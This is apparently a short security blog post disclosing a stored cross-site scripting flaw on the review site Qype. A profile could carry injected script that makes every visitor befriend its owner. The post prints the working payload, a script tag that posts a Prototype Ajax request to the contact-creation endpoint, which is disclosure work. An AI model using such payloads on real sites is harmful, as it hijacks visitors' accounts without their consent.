Found an XSS-injection on Qype which has enabled a user to inject malicious JavaScript into his profile in order to automatically become a friend of every visitor. As Qype is implemented in Rails they are using Prototype as a JavaScript library which made it pretty easy to implement a fitting exploit:
"><script>new Ajax.Request('/contact/create?to_user_id=16992', {method: 'post'})</script>Filed under Security, Websecurity, XSS & no comments & no trackbacks
Trackback specific URI for this entry